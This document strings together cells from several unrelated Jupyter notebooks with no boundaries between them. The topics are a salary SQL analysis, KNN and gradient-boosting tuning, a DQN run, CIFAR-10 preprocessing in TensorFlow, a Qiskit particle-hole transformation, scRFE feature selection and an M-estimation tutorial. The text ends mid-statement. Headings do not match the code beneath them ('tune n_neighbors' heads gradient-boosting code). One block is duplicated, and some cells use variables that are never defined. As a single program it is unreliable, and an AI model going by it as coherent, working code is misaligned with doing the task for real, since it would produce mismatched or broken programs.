dept_manager = pd.read_sql('select * from dept_manager', connection) dept_managerFigure out the Average Salary by Title#Merge the tables employee_salaries = employees.merge(salaries, on='emp_no') employee_title_salaries = employee_salaries.merge(titles, left_on='emp_title_id', right_on='title_id') st = employee_title_salaries[['title', 'salary']] #Calculate the mean st.groupby('title')['salary'].mean().round()Graph the results#Create a histogram to visualize the most common salary ranges for employees. 
st.hist(column='salary') plt.xlabel("Salaries in Dollars ($)") plt.ylabel("Number of people with Salary") plt.title("Salary Count") #Create a bar chart of average salary by title title_salary = st.groupby("title")["salary"].mean() title_salary.plot.bar() plt.xticks(rotation = 45) plt.xlabel("Titles") plt.ylabel("Salary in ($)")KNN Nutcracker | June 11, 2020 | update June 16, 2020# import local libraries using host specific paths import socket, sys, time, datetime, os import numpy as np import pandas as pd import matplotlib.pyplot as plt # get paths for local computer hostname = socket.gethostname().split('.')[0] # set local path settings based on computer host if hostname == 'PFC': pylibrary = '/Users/connylin/Dropbox/Code/proj' elif hostname == 'Angular-Gyrus': pylibrary = '/Users/connylin/Code/proj' else: assert False, 'host computer not regonized' # import local variables if pylibrary not in sys.path: sys.path.insert(1, pylibrary) from brainstation_capstone.ml.toolbox.mlSOP import test_model from brainstation_capstone.ml.toolbox.mlSOP import ml_timer from brainstation_capstone.ml.toolbox.mlSOP import ModelEvaluation from brainstation_capstone.system import host_paths localpaths = host_paths.get(hostname) data_dir = os.path.join(localpaths['Capstone'], 'data') # report latest run print(f'last ran on: {datetime.datetime.now()} PT') # import data from brainstation_capstone.etl.loaddata import nutcracker data = nutcracker(localpaths, 'nutcracker', ['X_train','X_test','y_train','y_test'])rough tune - takes forever to run. Discard this option# rough tune from sklearn.neighbors import KNeighborsClassifier KNN_model = KNeighborsClassifier(n_neighbors=3) KNN_model.fit(X_train, y_train) print('finished fitting model') print(f'train score: {KNN_model.score(X_train, y_train)}') print(f'test score: {KNN_model.score(X_test, y_test)}') # rough tune # example of grid searching key hyperparametres for KNeighborsClassifier from sklearn.model_selection import GridSearchCV from sklearn.neighbors import KNeighborsClassifier # define models and parameters model = KNeighborsClassifier() n_neighbors = range(1, 21, 2) weights = ['uniform', 'distance'] metric = ['euclidean', 'manhattan', 'minkowski'] # define grid search grid = dict(n_neighbors=n_neighbors,weights=weights,metric=metric) cv = 5 #cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1) grid_search = GridSearchCV(estimator=model, param_grid=grid, n_jobs=-1, cv=cv, scoring='accuracy',error_score=0, verbose=5) grid_result = grid_search.fit(X_train, y_train) # summarize results means = grid_result.cv_results_['mean_test_score'] stds = grid_result.cv_results_['std_test_score'] params = grid_result.cv_results_['params'] for mean, stdev, param in zip(means, stds, params): print("%f (%f) with: %r" % (mean, stdev, param)) print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))tune n_neighborsfrom sklearn.ensemble import GradientBoostingClassifier # hyperparameters - testing learning_rate = np.arange(0.9, 1, 0.02) # max tested 0.1 can be more (There is a trade-off between learning_rate and n_estimators) hyperparameter_list = learning_rate.copy() hyperparameter_name = 'learning_rate' # hyperparameters - determined - can tune further subsample = 0.8 # can tune between 0.99 to 0.5 max_depth = 4 # 9 or more can be better, but to limit time spend on tuning others, keep this low when testing n_estimators = 100 # more better, but takes a lot more time. 
# hyperparameters - determined - no further tuning verbose = 1 random_state = 318 loss = 'deviance' # hyperparameters - to test min_samples_leaf = 1 min_samples_split = 2 min_weight_fraction_leaf = 0.0 min_impurity_decrease = 0.0 min_impurity_split = None init = None max_features = None max_leaf_nodes = None validation_fraction = 0.1 n_iter_no_change = None tol = 1e-4 ccp_alpha = 0.0 # hyperparameters - test - low priorty criterion = 'friedman_mse' # generally best warm_start = False # test hyperparameter model_acc = test_model() timer = ml_timer() for parameter in hyperparameter_list: print(f'running: {hyperparameter_name} = {parameter}') timer.param_start() model = GradientBoostingClassifier(verbose=verbose, random_state=random_state, warm_start=warm_start, loss=loss, max_depth=max_depth, n_estimators=n_estimators, learning_rate=parameter, subsample=subsample, max_features=max_features, criterion=criterion, min_samples_split=min_samples_split, min_samples_leaf=min_samples_leaf, min_weight_fraction_leaf=min_weight_fraction_leaf, min_impurity_decrease=min_impurity_decrease, min_impurity_split=min_impurity_split, init=init, max_leaf_nodes=max_leaf_nodes, validation_fraction=validation_fraction, n_iter_no_change=n_iter_no_change, tol=tol, ccp_alpha=ccp_alpha ) model_acc.score_data(model, data) timer.param_end() print(model) # end time timer.session_end() time_per_session = timer.get_time() # graph hyperparameterplot(hyperparameter_list, model_acc.train_acc, model_acc.test_acc, hyperparameter_name) print(f'{hyperparameter_name} = {hyperparameter_list}') print(f'train_acc = {model_acc.train_acc}\ntest_acc = {model_acc.test_acc}') print(f'time per param = {time_per_session}') from sklearn.ensemble import GradientBoostingClassifier # hyperparameters - testing learning_rate = np.arange(0.9, 1, 0.02) # max tested 0.1 can be more (There is a trade-off between learning_rate and n_estimators) hyperparameter_list = learning_rate.copy() hyperparameter_name = 'learning_rate' # hyperparameters - determined - can tune further subsample = 0.8 # can tune between 0.99 to 0.5 max_depth = 4 # 9 or more can be better, but to limit time spend on tuning others, keep this low when testing n_estimators = 100 # more better, but takes a lot more time. 
# hyperparameters - determined - no further tuning verbose = 1 random_state = 318 loss = 'deviance' # hyperparameters - to test min_samples_leaf = 1 min_samples_split = 2 min_weight_fraction_leaf = 0.0 min_impurity_decrease = 0.0 min_impurity_split = None init = None max_features = None max_leaf_nodes = None validation_fraction = 0.1 n_iter_no_change = None tol = 1e-4 ccp_alpha = 0.0 # hyperparameters - test - low priorty criterion = 'friedman_mse' # generally best warm_start = False # test hyperparameter model_acc = test_model() timer = ml_timer() for parameter in hyperparameter_list: print(f'running: {hyperparameter_name} = {parameter}') timer.param_start() model = GradientBoostingClassifier(verbose=verbose, random_state=random_state, warm_start=warm_start, loss=loss, max_depth=max_depth, n_estimators=n_estimators, learning_rate=parameter, subsample=subsample, max_features=max_features, criterion=criterion, min_samples_split=min_samples_split, min_samples_leaf=min_samples_leaf, min_weight_fraction_leaf=min_weight_fraction_leaf, min_impurity_decrease=min_impurity_decrease, min_impurity_split=min_impurity_split, init=init, max_leaf_nodes=max_leaf_nodes, validation_fraction=validation_fraction, n_iter_no_change=n_iter_no_change, tol=tol, ccp_alpha=ccp_alpha ) model_acc.score_data(model, data) timer.param_end() print(model) # end time timer.session_end() time_per_session = timer.get_time() # graph hyperparameterplot(hyperparameter_list, model_acc.train_acc, model_acc.test_acc, hyperparameter_name) print(f'{hyperparameter_name} = {hyperparameter_list}') print(f'train_acc = {model_acc.train_acc}\ntest_acc = {model_acc.test_acc}') print(f'time per param = {time_per_session}')This is the model without memory and just backproping on all the examples! time th DQN_Simulation.lua --nepochs 1000 --gamma 0.8 \ --learning_rate 1e-4 --cuts 5 --n_rand 100 \ --edim 50 --mem_size 6 --metric f1 --nnmod bow _ = plotdata('./sim_perf.txt', 'Rouge, Loss, Epsilon across training Epochs - BOW') ! 
time th DQN_Simulation.lua --nepochs 1000 --gamma 0 \ --learning_rate 1e-4 --cuts 5 --n_rand 100 \ --edim 50 --mem_size 6 --metric f1 --nnmod bow _ = plotdata('./sim_perf.txt', 'Rouge, Loss, Epsilon across training Epochs - BOW')**[CDS-01]** Import the required modules and set the random seed. import tensorflow as tf import numpy as np import matplotlib.pyplot as plt ### Required on the Windows version import os ### np.random.seed(20160704) tf.set_random_seed(20160704)**[CDS-02]** Download the CIFAR-10 dataset. The download takes a little while to complete. ### On Linux, remove the leading "#" from the following 5 lines. #%%bash #mkdir -p /tmp/cifar10_data #cd /tmp/cifar10_data #curl -OL http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz #tar xzf cifar-10-binary.tar.gz ### Windows version !mkdir \tmp\cifar10_data > NUL 2>&1 os.chdir("\\tmp\\cifar10_data") !curl -OL http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz !tar -xzf cifar-10-binary.tar.gz (curl download progress output omitted)**[CDS-03]** Check the downloaded data. Here we use the test-set file test_batch.bin. ### On Linux, remove the leading "#" from the line below. #!ls -lR /tmp/cifar10_data ### Windows version !dir /B /S \tmp\cifar10_dataC:\tmp\cifar10_data\cifar-10-batches-bin C:\tmp\cifar10_data\cifar-10-binary.tar.gz C:\tmp\cifar10_data\cifar-10-batches-bin\batches.meta.txt C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_1.bin C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_2.bin C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_3.bin C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_4.bin C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_5.bin C:\tmp\cifar10_data\cifar-10-batches-bin\readme.html C:\tmp\cifar10_data\cifar-10-batches-bin\test_batch.bin**[CDS-04]** Prepare a function that reads the images and label data from the data files. def read_cifar10(filename_queue): class CIFAR10Record(object): pass result = CIFAR10Record() label_bytes = 1 result.height = 32 result.width = 32 result.depth = 3 image_bytes = result.height * result.width * result.depth record_bytes = label_bytes + image_bytes reader = tf.FixedLengthRecordReader(record_bytes=record_bytes) result.key, value = reader.read(filename_queue) record_bytes = tf.decode_raw(value, tf.uint8) result.label = tf.cast( tf.slice(record_bytes, [0], [label_bytes]), tf.int32) depth_major = tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]), [result.depth, result.height, result.width]) # Convert from [depth, height, width] to [height, width, depth].
result.uint8image = tf.transpose(depth_major, [1, 2, 0]) return result**[CDS-04]** Display 8 sample images for each label. sess = tf.Session() filename = '/tmp/cifar10_data/cifar-10-batches-bin/test_batch.bin' q = tf.FIFOQueue(99, [tf.string], shapes=()) q.enqueue([filename]).run(session=sess) q.close().run(session=sess) result = read_cifar10(q) samples = [[] for l in range(10)] while(True): label, image = sess.run([result.label, result.uint8image]) label = label[0] if len(samples[label]) < 8: samples[label].append(image) if all([len(samples[l]) >= 8 for l in range(10)]): break fig = plt.figure(figsize=(8,10)) for l in range(10): for c in range(8): subplot = fig.add_subplot(10, 8, l*8+c+1) subplot.set_xticks([]) subplot.set_yticks([]) image = samples[l][c] subplot.imshow(image.astype(np.uint8)) sess.close() ### Some WARNING will be displayed as following ... #WARNING:tensorflow:From ... FixedLengthRecordReader.__init__...WARNING:tensorflow:From :12: FixedLengthRecordReader.__init__ (from tensorflow.python.ops.io_ops) is deprecated and will be removed in a future version. Instructions for updating: Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.FixedLengthRecordDataset`.**[CDS-05]** Prepare a function that generates preprocessed images. def distorted_samples(image): reshaped_image = tf.cast(image, tf.float32) width, height = 24, 24 float_images = [] resized_image = tf.image.resize_image_with_crop_or_pad(reshaped_image, width, height) # float_image = tf.image.per_image_whitening(resized_image) float_image = tf.image.per_image_standardization(resized_image) float_images.append(float_image) for _ in range(6): distorted_image = tf.random_crop(reshaped_image, [height, width, 3]) distorted_image = tf.image.random_flip_left_right(distorted_image) distorted_image = tf.image.random_brightness(distorted_image, max_delta=63) distorted_image = tf.image.random_contrast(distorted_image, lower=0.2, upper=1.8) # float_image = tf.image.per_image_whitening(distorted_image) float_image = tf.image.per_image_standardization(distorted_image) float_images.append(float_image) # return tf.concat(0,float_images) return tf.concat(float_images,0)**[CDS-06]** For each label, display the original image and the preprocessed images. sess = tf.Session() filename = '/tmp/cifar10_data/cifar-10-batches-bin/test_batch.bin' q = tf.FIFOQueue(99, [tf.string], shapes=()) q.enqueue([filename]).run(session=sess) q.close().run(session=sess) result = read_cifar10(q) fig = plt.figure(figsize=(8,10)) c = 0 original = {} modified = {} while len(original.keys()) < 10: label, orig, dists = sess.run([result.label, result.uint8image, distorted_samples(result.uint8image)]) label = label[0] if not label in original.keys(): original[label] = orig modified[label] = dists for l in range(10): orig, dists = original[l], modified[l] c += 1 subplot = fig.add_subplot(10, 8, c) subplot.set_xticks([]) subplot.set_yticks([]) subplot.imshow(orig.astype(np.uint8)) for i in range(7): c += 1 subplot = fig.add_subplot(10, 8, c) subplot.set_xticks([]) subplot.set_yticks([]) pos = i*24 image = dists[pos:pos+24]*40+120 subplot.imshow(image.astype(np.uint8)) sess.close()_*Particle hole transformation of FermionicOperator*_This notebook demonstrates carrying out a ParticleHole transformation on the FermionicOperator in Qiskit Chemistry. Here we use the FermionicOperator directly to demonstrate.Note: The Hamiltonian class that wraps this provides a means to use either full, or particle hole transformation.
Under the covers it does what is shown here though.This notebook has been written to use the PYSCF chemistry driver.import numpy as np from qiskit import BasicAer from qiskit.transpiler import PassManager from qiskit.aqua import Operator, QuantumInstance from qiskit.aqua.algorithms.adaptive import VQE from qiskit.aqua.algorithms.classical import ExactEigensolver from qiskit.aqua.components.optimizers import L_BFGS_B from qiskit.aqua.components.variational_forms import RY from qiskit.chemistry import FermionicOperator from qiskit.chemistry.drivers import PySCFDriver, UnitsTypeWe'll do this with H2 molecule and use the PySCF driver to create the integrals we need for the FermionicOperator.driver = PySCFDriver(atom='H .0 .0 .0; H .0 .0 0.735', unit=UnitsType.ANGSTROM, charge=0, spin=0, basis='sto3g') molecule = driver.run()We first create the FermionicOperator and use ExactEigensolver with qubit operator we get from it via a jordan wigner mapping to compute the ground state energy. Here this is the electronic component of the total ground state energy (the total ground state energy would include the nuclear repulsion energy we can get from the molecule that comes from the driver)ferOp = FermionicOperator(h1=molecule.one_body_integrals, h2=molecule.two_body_integrals) qubitOp_jw = ferOp.mapping(map_type='JORDAN_WIGNER', threshold=0.00000001) qubitOp_jw.chop(10**-10) # Using exact eigensolver to get the smallest eigenvalue exact_eigensolver = ExactEigensolver(qubitOp_jw, k=1) ret = exact_eigensolver.run() # print(qubitOp_jw.print_operators()) print('The exact ground state energy is: {}'.format(ret['energy'])) print('The Hartree Fock Electron Energy is: {}'.format(molecule.hf_energy - molecule.nuclear_repulsion_energy))The exact ground state energy is: -1.8572750302023795 The Hartree Fock Electron Energy is: -1.8369679912029842Now the same as above but with ParticleHole transformation. This removes out energy from the FermionicOperator that is equivalent to the electronic part of the Hartree Fock Energy that we also computed above. The Hartree Fock energy also comes from the driver. To get the total electronic ground state energy we need to add the part we now compute with the part that was removed by the transformation.# particle hole transformation newferOp, energy_shift = ferOp.particle_hole_transformation(num_particles=2) print('Energy shift is: {}'.format(energy_shift)) newqubitOp_jw = newferOp.mapping(map_type='JORDAN_WIGNER', threshold=0.00000001) newqubitOp_jw.chop(10**-10) exact_eigensolver = ExactEigensolver(newqubitOp_jw, k=1) ret = exact_eigensolver.run() # print(newqubitOp_jw.print_operators()) print('The exact ground state energy in PH basis is {}'.format(ret['energy'])) print('The exact ground state energy in PH basis is {} (with energy_shift)'.format(ret['energy'] - energy_shift))Energy shift is: 1.8369679912029846 The exact ground state energy in PH basis is -0.020307038999396183 The exact ground state energy in PH basis is -1.8572750302023808 (with energy_shift)We run here using the quantum VQE algorithm to show the same result. 
The parameters printed are the optimal parameters of the variational form at the minimum energy, the ground state.# setup VQE # setup optimizer, use L_BFGS_B optimizer for example lbfgs = L_BFGS_B(maxfun=1000, factr=10, iprint=10) # setup variational form generator (generate trial circuits for VQE) var_form = RY(newqubitOp_jw.num_qubits, 5, entangler_map = [[0, 1], [1, 2], [2, 3]]) # setup VQE with operator, variational form, and optimizer vqe_algorithm = VQE(newqubitOp_jw, var_form, lbfgs, 'matrix') backend = BasicAer.get_backend('statevector_simulator') quantum_instance = QuantumInstance(backend, pass_manager=PassManager()) results = vqe_algorithm.run(quantum_instance) print("Minimum value: {}".format(results['eigvals'][0].real)) print("Minimum value: {}".format(results['eigvals'][0].real - energy_shift)) print("Parameters: {}".format(results['opt_params']))Minimum value: -0.020307038771711697 Minimum value: -1.8572750299746963 Parameters: [-0.62024568 -0.94461634 -0.12822854 -1.33174693 -3.12835752 -2.41119768 0.67926104 2.44344768 0.72721421 -2.76518798 -1.08251803 -1.75962366 0.54861203 1.8995056 3.04269648 -1.75046119 0.16409288 0.68204022 -0.07661803 -0.76359574 -1.56412942 -2.02324628 1.50961019 1.31452025]scRFE# MENTION ONE VS ALL CLASSIFICATION in description # Imports import numpy as np import pandas as pd import scanpy as sc import random from anndata import read_h5ad from sklearn.ensemble import RandomForestClassifier from sklearn.model_selection import train_test_split from sklearn.feature_selection import SelectFromModel from sklearn.metrics import accuracy_score from sklearn.feature_selection import RFE from sklearn.feature_selection import RFECV import seaborn as sns import matplotlib.pyplot as plt def filterNormalize (dataMatrix, classOfInterest): np.random.seed(644685) sc.logging.print_versions() sc.settings.verbosity = 3 sc.logging.print_versions() tiss = dataMatrix tiss.obs['n_counts'] = tiss.X.sum(axis=1).A1 sc.pp.filter_cells(tiss, min_genes=250) sc.pp.filter_genes(tiss, min_cells=3) tiss = tiss[tiss.obs['n_counts'] > 1500, :] sc.pp.normalize_per_cell(tiss, counts_per_cell_after=1e5) sc.pp.log1p(tiss) tiss.raw = tiss tiss = tiss[tiss.obs[classOfInterest]!='nan'] return tiss # goal: get labels on a per class basis that will go into randomForest function for y def getLabels (dataMatrix, classOfInterest): """ Gets labels on a per class basis that will inputted to the randomForest function Parameters ---------- dataMatrix : anndata object The data file of interest classOfInterest : str The class you will split the data by in the set of dataMatrix.obs Returns ------- labelsDict : dict Dictionary with labels for each class """ dataMatrix = filterNormalize (dataMatrix, classOfInterest) labelsDict = {} for label in np.unique(dataMatrix.obs[classOfInterest]): lists = [] for obs in dataMatrix.obs[classOfInterest]: if obs == label: lists.append('A') else: lists.append('B') labelsDict[label] = lists #this is usually in line w if and else return labelsDict def makeOneForest (dataMatrix, classOfInterest, labelOfInterest, nEstimators = 5000, randomState = 0, nJobs = -1, oobScore = True, Step = 0.2, Cv = 5): """ Builds and runs a random forest for one label in a class of interest Parameters ---------- dataMatrix : anndata object The data file of interest classOfInterest : str The class you will split the data by in the set of dataMatrix.obs labelOfInterest : str The specific label within the class that the random forezt will run a "one vs all" classification on nEstimators : int The 
number of trees in the forest randomState : int Controls random number being used nJobs : int The number of jobs to run in parallel oobScore : bool Whether to use out-of-bag samples to estimate the generalization accuracy Step : float Corresponds to percentage of features to remove at each iteration Cv : int Determines the cross-validation splitting strategy Returns ------- feature_selected : list list of top features from random forest selector.estimator_.feature_importances_ : list list of top ginis corresponding to to features """ dataMatrix = filterNormalize (dataMatrix, classOfInterest) # print('makeOneForest' + labelOfInterest) labelsDict = getLabels(dataMatrix, classOfInterest) feat_labels = dataMatrix.var_names #this is equivalent of the genes X = dataMatrix.X y = labelsDict[labelOfInterest] # print('Y') clf = RandomForestClassifier(n_estimators = nEstimators, random_state = randomState, n_jobs = nJobs, oob_score = oobScore) selector = RFECV(clf, step = Step, cv = Cv) # print('training...') clf.fit(X, y) selector.fit(X, y) feature_selected = feat_labels[selector.support_] return feature_selected, selector.estimator_.feature_importances_ def resultWrite (classOfInterest, results_df, labelOfInterest, feature_selected, feature_importance): # print ('result writing') # print(results_df) column_headings = [] column_headings.append(labelOfInterest) column_headings.append(labelOfInterest + '_gini') resaux = pd.DataFrame(columns = column_headings) resaux[labelOfInterest] = feature_selected resaux[labelOfInterest + '_gini'] = feature_importance resaux = resaux.sort_values(by = [labelOfInterest + '_gini'], ascending = False) resaux.reset_index(drop = True, inplace = True) results_df = pd.concat([results_df, resaux], axis=1) return results_df def scRFE(dataMatrix, classOfInterest, nEstimators = 5000, randomState = 0, nJobs = -1, oobScore = True, Step = 0.2, Cv = 5): """ Builds and runs a random forest with one vs all classification for each label for one class of interest Parameters ---------- dataMatrix : anndata object The data file of interest classOfInterest : str The class you will split the data by in the set of dataMatrix.obs labelOfInterest : str The specific label within the class that the random forezt will run a "one vs all" classification on nEstimators : int The number of trees in the forest randomState : int Controls random number being used nJobs : int The number of jobs to run in parallel oobScore : bool Whether to use out-of-bag samples to estimate the generalization accuracy Step : float Corresponds to percentage of features to remove at each iteration Cv : int Determines the cross-validation splitting strategy Returns ------- results_df : pd.DataFrame Dataframe with results for each label in the class, formatted as "label" for one column, then "label + gini" for the corresponding column """ dataMatrix = filterNormalize (dataMatrix, classOfInterest) results_df = pd.DataFrame() for labelOfInterest in np.unique(dataMatrix.obs[classOfInterest]): #for timeliness # print( 'scRFE' + labelOfInterest) feature_selected, feature_importance = makeOneForest(dataMatrix, classOfInterest, labelOfInterest = labelOfInterest) results_df = resultWrite (classOfInterest, results_df, labelOfInterest = labelOfInterest, feature_selected = feature_selected, feature_importance = feature_importance) # print(results_df.shape) return results_dfM-estimation of stochastic action plansGenerally, we are interested in the estimation of deterministic action plans. 
For example, we may want to estimate the mean of an outcome with everyone under action $a=1$. Using potential outcomes, this quantity is $$E[Y(a=1)]$$ where $Y(a)$ is the potential outcome under action $a$ (and observations are assumed to be IID). A competing estimand is the outcome mean under a stochastic plan. Namely, the stochastic plan sets the *probability* of an action for each individual. We denote this investigator-specified probability by $\Pr^*(A=1 | W)$, where $A$ is the action and $W$ is the set of baseline covariates. The stochastic mean can be denoted as $$E[Y(a=1) \Pr^*(A=1 | W) + Y(a=0) \{1 - \Pr^*(A=1 | W)\}]$$ Notice the deterministic plan is a special case of a stochastic plan, where $\Pr^*(A=1 | W) = 1$ (and reduces to the previous). A variety of $\Pr^*(A=1 | W)$ functions can be specified. One general example is to set the probability to a constant, $\Pr^*(A=1 | W) = \alpha$. For example, $\alpha = 0.5$ would correspond to the mean had everyone been given a 50% chance of $a=1$. This type of investigator-specified function could further be made to change based on the baseline covariates $W$. Perhaps a more realistic alternative (or rather an investigator-specified function more amenable to actual implementation) is a shift in an individual's probability of an action. If $\Pr(A=1 | W)$ denotes the population conditional probability of an action, then we can consider the policy $$\Pr^*(A=1 | W) = \text{logit}^{-1}\left( \text{logit}\{\Pr(A=1 | W)\} + \delta \right)$$ where $\delta$ indicates a shift in the log-odds of the action. Therefore, this plan can be viewed as an intervention which increases (or decreases for $\delta < 0$) the uptake of action $a=1$. Hereafter, our tutorial focuses on this latter plan. To estimate the mean under our stochastic plan, we use the following inverse probability weighting estimator $$\hat{\mu}_{IPW} = \frac{1}{n} \sum_{i=1}^n Y_i \frac{\Pr^*(A_i=a_i|W_i)}{\Pr(A_i=a_i | W_i)}$$ where $a_i$ is the action actually observed for unit $i$. Overview: Here, we demonstrate how M-estimation can be used to estimate the mean under stochastic action plans. Specifically, we demonstrate plans where the probability of $A=1$ is shifted, which involves estimation of the conditional probability of $A=1$. We discuss the pitfall: estimation of the probability to be shifted is treated as known.
We show how M-estimation (and the sandwich variance) can easily accomodate this feature.# Initial setup import numpy as np import scipy as sp import pandas as pd import matplotlib.pyplot as plt %matplotlib inline import delicatessen from delicatessen import MEstimator from delicatessen.estimating_equations import ee_logistic_regression from delicatessen.estimating_equations import ee_ridge_linear_regression from delicatessen.utilities import inverse_logit np.random.seed(51520837) print("NumPy version: ", np.__version__) print("SciPy version: ", sp.__version__) print("Pandas version: ", pd.__version__) print("Delicatessen version:", delicatessen.__version__)NumPy version: 1.19.5 SciPy version: 1.5.4 Pandas version: 1.1.5 Delicatessen version: 0.2Motivating ProblemTo motivate our discussion, we will consider data generated according to the following diagram.from zepid.causal.causalgraph import DirectedAcyclicGraph from zepid.graphics import pvalue_plot dag = DirectedAcyclicGraph(exposure="A", outcome="Y") dag.add_arrows(pairs=(("A", "Y"), ("W", "Y"), ("W", "A"))) pos = {"A": [0, 0], "Y": [1, 0], "W": [-1, 0.01]} dag.draw_dag(positions=pos)The following generates 1000 observations that adhere to the causal diagramn = 1000 # Generating lots of observations to reduce randomness # Generating baseline covariates d = pd.DataFrame() d['W'] = np.random.normal(size=n) # Generating actions pr_a = sp.stats.logistic.cdf(0. + 0.9*d['W']) d['A'] = np.random.binomial(n=1, p=pr_a, size=n) # Generating potential outcomes d['Ya1'] = (25 + 2 - 2.5*d['W'] + 1.6*1*d['W'] + np.random.normal(size=n)) d['Ya0'] = (25 + 0 - 2.5*d['W'] + 1.6*0*d['W'] + np.random.normal(size=n)) # Generating outcomes via causal consistency d['Y'] = np.where(d['A'] == 1, d['Ya1'], d['Ya0']) # Data we get to see d = d[["W", "A", "Y"]].copy() d['C'] = 1 d.describe()EstimationHere, we estimate the probability of $A$. Those probabilities are then shifted according to our policy (plus 1.5 to the log-odds of $A$). The shifted probability is treated an being estimated in this M-estimator (since the coefficients for the model are all being estimated inside the `psi` function).# Extracting covariates for use in psi() W = np.asarray(d[['C', 'W']]) A = np.asarray(d['A']) y = np.asarray(d['Y']) delta = 1.5 def psi(theta): beta = theta[1:] # Estimating Pr(A=1|W=w) for weights a_model = ee_logistic_regression(beta, X=W, y=A) logit_pi_aw = np.dot(W, beta) # Constructing denominator of weights pi_a = inverse_logit(logit_pi_aw) # Constructing numerator of weights pi_a_delta = inverse_logit(logit_pi_aw + delta) # Creating IPW ipw = np.where(A==1, pi_a_delta/pi_a, (1-pi_a_delta)/(1-pi_a)) # Calculating mean at stochastic policy ya_delta = y*ipw - theta[0] # Returning estimating equations return np.vstack((ya_delta[None, :], a_model)) # Estimating equation starting_vals = [0, 0, 0] estr1 = MEstimator(psi, init=starting_vals) estr1.estimate(solver='lm') mean = estr1.theta[0] var = estr1.variance[0, 0] ci = estr1.confidence_intervals()[0, :] print("======================================") print("Accounting for Confounding") print("======================================") print("ACE: ", np.round(mean, 3)) print("95% CI:", np.round(ci, 3)) print("======================================")====================================== Accounting for Confounding ====================================== ACE: 26.765 95% CI: [26.642 26.888] ======================================This second M-estimator treats the probabilities being shifted as *known*. 
This can be seen by the coefficients used to construct `pi_a_delta` being estimated outside of the `psi` function (the coefficients are pulled from the previous model). Therefore, this M-estimator (incorrectly) assumes that the stochastic plan is *known*.# Extracting covariates for use in psi() W = np.asarray(d[['C', 'W']]) A = np.asarray(d['A']) y = np.asarray(d['Y']) # previous coefficients coefs = estr1.theta[1:] delta = 1.5 def psi(theta): beta = theta[1:] # Estimating Pr(A=1|W=w) and weights a_model = ee_logistic_regression(beta, X=W, y=A) logit_pi_aw = np.dot(W, beta) # Constructing denominator of weights pi_a = inverse_logit(logit_pi_aw) # Constructing numerator of weights pi_a_delta = inverse_logit(np.dot(W, coefs) + delta) # Creating IPW ipw = np.where(A==1, pi_a_delta/pi_a, (1-pi_a_delta)/(1-pi_a)) # Calculating ACE ya_delta = y*ipw - theta[0] return np.vstack((ya_delta[None, :], a_model)) starting_vals = [0, 0, 0] estr2 = MEstimator(psi, init=starting_vals) estr2.estimate(solver='lm') mean2 = estr2.theta[0] var2 = estr2.variance[0, 0] ci2 = estr2.confidence_intervals()[0, :] print("======================================") print("Accounting for Confounding") print("======================================") print("ACE: ", np.round(mean2, 3)) print("95% CI:", np.round(ci2, 3)) print("======================================")====================================== Accounting for Confounding ====================================== ACE: 26.765 95% CI: [26.648 26.882] ======================================While not extreme in this example, we can see that the confidence interval difference is smaller for the latter estimator. Ignoring the fact that we need to estimate pieces of the stochastic plan leads to a false sense of greater precision. The first estimator is what should be used here. Simulation studyTo better explore the difference between these two competing estimators, below is a simple simulation study. We will compare bias (no difference expected) and confidence interval coverage (the latter estimator may have below expected confidence interval coverage). We evaluate for a variety of values: $-5 \le \delta \le 5$.def dgm_true(delta): n = 1000000 d = pd.DataFrame() d['W'] = np.random.normal(size=n) pr_a = sp.stats.logistic.cdf(0. + 0.9*d['W'] + delta) d['A'] = np.random.binomial(n=1, p=pr_a, size=n) d['Ya1'] = (25 + 2 - 2.5*d['W'] + 1.6*1*d['W'] + np.random.normal(size=n)) d['Ya0'] = (25 + 0 - 2.5*d['W'] + 1.6*0*d['W'] + np.random.normal(size=n)) d['Y'] = np.where(d['A'] == 1, d['Ya1'], d['Ya0']) return np.mean(d['Y']) def dgm(n): d = pd.DataFrame() d['W'] = np.random.normal(size=n) pr_a = sp.stats.logistic.cdf(0. 
+ 0.9*d['W']) d['A'] = np.random.binomial(n=1, p=pr_a, size=n) d['Ya1'] = (25 + 2 - 2.5*d['W'] + 1.6*1*d['W'] + np.random.normal(size=n)) d['Ya0'] = (25 + 0 - 2.5*d['W'] + 1.6*0*d['W'] + np.random.normal(size=n)) d['Y'] = np.where(d['A'] == 1, d['Ya1'], d['Ya0']) d['C'] = 1 return d[["W", "A", "C", "Y"]] def psi_estr1(theta, delta, W, A, y): beta = theta[1:] # Estimating Pr(A=1|W=w) for weights a_model = ee_logistic_regression(beta, X=W, y=A) logit_pi_aw = np.dot(W, beta) # Constructing denominator of weights pi_a = inverse_logit(logit_pi_aw) # Constructing numerator of weights pi_a_delta = inverse_logit(logit_pi_aw + delta) # Creating IPW ipw = np.where(A==1, pi_a_delta/pi_a, (1-pi_a_delta)/(1-pi_a)) # Calculating mean at stochastic policy ya_delta = y*ipw - theta[0] # Returning estimating equations return np.vstack((ya_delta[None, :], a_model)) def psi_estr2(theta, delta, W, A, y, coefs): beta = theta[1:] # Estimating Pr(A=1|W=w) for weights a_model = ee_logistic_regression(beta, X=W, y=A) logit_pi_aw = np.dot(W, beta) # Constructing denominator of weights pi_a = inverse_logit(logit_pi_aw) # Constructing numerator of weights pi_a_delta = inverse_logit(np.dot(W, coefs) + delta) # Creating IPW ipw = np.where(A==1, pi_a_delta/pi_a, (1-pi_a_delta)/(1-pi_a)) # Calculating mean at stochastic policy ya_delta = y*ipw - theta[0] # Returning estimating equations return np.vstack((ya_delta[None, :], a_model)) delta = np.linspace(-5, 5, 41) truth = {} est_estr1, est_estr2 = {}, {} ci_estr1, ci_estr2 = {}, {} for d in delta: truth[d] = dgm_true(delta=d) est_estr1[d], est_estr2[d] = [], [] ci_estr1[d], ci_estr2[d] = [], [] # Ignoring any warnings in the sims (to keep output clean) import warnings warnings.filterwarnings("ignore") for i in range(4000): data = dgm(n=1000) for d in delta: W = np.asarray(data[['C', 'W']]) A = np.asarray(data['A']) y = np.asarray(data['Y']) # First option def psi(theta): return psi_estr1(theta=theta, delta=d, W=W, A=A, 